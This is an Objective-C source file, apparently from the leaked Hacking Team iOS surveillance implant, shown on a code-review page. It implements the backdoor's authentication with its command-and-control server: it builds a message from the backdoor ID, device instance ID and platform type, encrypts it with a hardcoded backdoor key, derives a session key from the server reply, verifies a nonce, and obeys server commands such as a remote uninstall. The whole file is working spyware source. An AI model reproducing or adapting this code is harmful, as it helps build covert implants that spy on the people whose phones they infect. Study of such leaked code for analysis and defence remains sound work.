hackedteam/core-ios

View on GitHub
core/Modules/AuthNetworkOperation.m

Summary

Maintainability
Test Coverage
/*
 * RCSMac - Authentication Network Operation
 *
 *
 * Created on 13/01/2011
 * Copyright (C) HT srl 2011. All rights reserved
 *
 */

#import "AuthNetworkOperation.h"

#import "NSMutableData+AES128.h"
#import "NSString+SHA1.h"
#import "NSData+SHA1.h"
#import "RCSICommon.h"
#import "RCSITaskManager.h"
#import "RCSISharedMemory.h"

#import "RCSIGlobals.h"

#define JSON_CONF
////#import "RCSMLogger.h"
////#import "RCSMDebug.h"

//#define DEBUG_AUTH_NOP
#define infoLog NSLog
#define errorLog NSLog
#define warnLog NSLog

@implementation AuthNetworkOperation

- (id)initWithTransport: (RESTTransport *)aTransport
{
  if ((self = [super init]))
    {
      mBackdoorSignature = [[NSData alloc] initWithBytes: gBackdoorSignature
                                                  length: CC_MD5_DIGEST_LENGTH];
      mTransport = aTransport;

      return self;
    }
  
  return nil;
}

- (void)dealloc
{
  [mBackdoorSignature release];
  
  [super dealloc];
}

- (BOOL)perform
{ 
  NSAutoreleasePool *outerPool = [[NSAutoreleasePool alloc] init];
  
  u_int randomNumber, i;
  srandom(time(NULL));

  char nullTerminator = 0x00;
  
  NSMutableData *kd     = [[NSMutableData alloc] init];
  NSMutableData *nOnce  = [[NSMutableData alloc] init];
  
  // Generate kd (16 bytes)
  for (i = 0; i < 16; i += 4)
    {
      randomNumber = random();
      [kd appendBytes: (const void *)&randomNumber
               length: sizeof(randomNumber)];
    }

  // Generate nonce (16 bytes)
  for (i = 0; i < 16; i += 4)
    {
      randomNumber = random();
      [nOnce appendBytes: (const void *)&randomNumber
                  length: sizeof(randomNumber)];
    }
  
  NSData *confKey = [NSData dataWithBytes: &gConfAesKey
                                   length: CC_MD5_DIGEST_LENGTH];
  
  NSString *_instanceID = getCurrInstanceID();
  
  NSData *instanceID = [_instanceID sha1Hash];
  
  NSMutableData *backdoorID = [[NSMutableData alloc] init];
  
  [backdoorID appendBytes: &gBackdoorID
                   length: strlen(gBackdoorID)];
                   
  [backdoorID appendBytes: &nullTerminator
                   length: sizeof(char)];
  [backdoorID appendBytes: &nullTerminator
                   length: sizeof(char)];

  // FIXED-
  NSMutableData *type;
  
  if (gIsDemoMode)
    type = [[NSMutableData alloc] initWithData:
                                  [@"IOS-DEMO" dataUsingEncoding: NSASCIIStringEncoding]];
  else
    type = [[NSMutableData alloc] initWithData:
                                  [@"IOS" dataUsingEncoding: NSASCIIStringEncoding]];
  
  int typeLen = 16 - [type length];
  
  for (i = 0; i < typeLen; i++)
    {
      [type appendBytes: &nullTerminator
                 length: sizeof(char)];
    }
  
  // Generate id token sha1(backdoor_id + instance + subtype + confkey)
  NSMutableData *idToken = [[NSMutableData alloc] init];
  [idToken appendData: backdoorID];
  [idToken appendData: instanceID];
  [idToken appendData: type];
  [idToken appendData: confKey];

#ifdef DEBUG_AUTH_NOP
  infoLog(@"kd    : %@", kd);
  infoLog(@"nOnce : %@", nOnce);
  infoLog(@"backdoorID  : %@", backdoorID);
  infoLog(@"instanceID  : %@", instanceID);
  infoLog(@"type        : %@", type);
  infoLog(@"confkey     : %@", confKey);
  infoLog(@"idToken: %@", idToken);
#endif

  NSData *shaIDToken = [idToken sha1Hash];
  
  // Prepare the encrypted message
  NSMutableData *message = [[NSMutableData alloc] init];
  [message appendData: kd];
  [message appendData: nOnce];
  [message appendData: backdoorID];
  [message appendData: instanceID];
  [message appendData: type];
  [message appendData: shaIDToken];
 
  NSMutableData *encMessage = [[NSMutableData alloc] initWithData: message];
  [encMessage encryptWithKey: mBackdoorSignature];
   
  // Send encrypted message
  NSURLResponse *urlResponse  = nil;
  NSData *replyData           = nil;
  
  replyData = [mTransport sendData: encMessage
                 returningResponse: urlResponse];
  
  if ([replyData length] != 64)
    {    
      [kd release];
      [nOnce release];
      [backdoorID release];
      [type release];
      [idToken release];
      [message release];
      [encMessage release];
      [outerPool release];
      return NO;
    }
  
  // first 32 bytes are the Ks choosen by the server
  // decrypt it and store to create the session key along with Kd and Cb
  NSMutableData *ksCrypted = [[NSMutableData alloc] initWithBytes: [replyData bytes]
                                                           length: 32];
  [ksCrypted decryptWithKey: mBackdoorSignature];
  NSData *ks = [[NSData alloc] initWithBytes: [ksCrypted bytes]
                                      length: CC_MD5_DIGEST_LENGTH];
  [ksCrypted release];
  
  NSString *ksString = [[NSString alloc] initWithData: ks
                                             encoding: NSUTF8StringEncoding];

  // calculate the session key -> K = sha1(Cb || Ks || Kd)
  // we use a schema like PBKDF1
  // remember it for the entire session
  NSMutableData *sessionKey = [[NSMutableData alloc] init];
  [sessionKey appendData: confKey];
  [sessionKey appendData: ks];
  [sessionKey appendData: kd];
  
  gSessionKey = [[NSMutableData alloc] initWithData: [sessionKey sha1Hash]];

  [sessionKey release];
  
  // second part of the server response contains the NOnce and the response
  // extract the NOnce and check if it is ok
  // this MUST be the same NOnce sent to the server, but since it is crypted
  // with the session key we know that the server knows Cb and thus is trusted
  NSMutableData *secondPartResponse;
  @try
    {
      secondPartResponse = [[NSMutableData alloc] initWithData:
                            [replyData subdataWithRange:
                             NSMakeRange(32, [replyData length] - 32)]];
    }
  @catch (NSException *e)
    {  
      [kd release];
      [nOnce release];
      [backdoorID release];
      [type release];
      [idToken release];
      [message release];
      [encMessage release];
      [gSessionKey release];
      gSessionKey = nil;
      [outerPool release];
      return NO;
    }
  
  [secondPartResponse decryptWithKey: gSessionKey];
  
  NSData *rNonce = [[NSData alloc] initWithBytes: [secondPartResponse bytes]
                                          length: 16];
  if ([nOnce isEqualToData: rNonce] == NO)
    {    
      [kd release];
      [nOnce release];
      [backdoorID release];
      [type release];
      [idToken release];
      [message release];
      [encMessage release];
      [gSessionKey release];
      gSessionKey = nil;
      [rNonce release];
      [outerPool release];
      return NO;
    }
  
  NSData *_protoCommand;
  uint32_t protoCommand;
  
  @try
    {
      _protoCommand = [[NSData alloc] initWithData:
                       [secondPartResponse subdataWithRange: NSMakeRange(16, 4)]];
      [_protoCommand getBytes: &protoCommand
                        range: NSMakeRange(0, sizeof(int))];
    }
  @catch (NSException *e)
    {
      [kd release];
      [nOnce release];
      [backdoorID release];
      [type release];
      [idToken release];
      [message release];
      [encMessage release];
      [gSessionKey release];
      gSessionKey = nil;
      [rNonce release];
      [_protoCommand release];
      [outerPool release];
      return NO;
    }
  
  [kd release];
  [nOnce release];
  [backdoorID release];
  [type release];
  [idToken release];
  [message release];
  [encMessage release];
  [ks release];
  [ksString release];
  [secondPartResponse release];
  [rNonce release];
  [outerPool release];
  
  switch (protoCommand)
    {
    case PROTO_OK:
      {
      } break;
    case PROTO_UNINSTALL:
      {
        shMemoryLog params;
        params.agentID  = CORE_NOTIFICATION;
        params.flag     = ACTION_DO_UNINSTALL;
        
        NSData *msgData = [[NSData alloc] initWithBytes: &params
                                                 length: sizeof(shMemoryLog)];
        
        [_i_SharedMemory sendMessageToCoreMachPort: msgData];
        
        [_protoCommand release];
        return NO;
      }
      break;
    case PROTO_NO:
    default:
      {
        [_protoCommand release];
        return NO;
      } break;
    }

  [_protoCommand release];
  
  return YES;
}

@end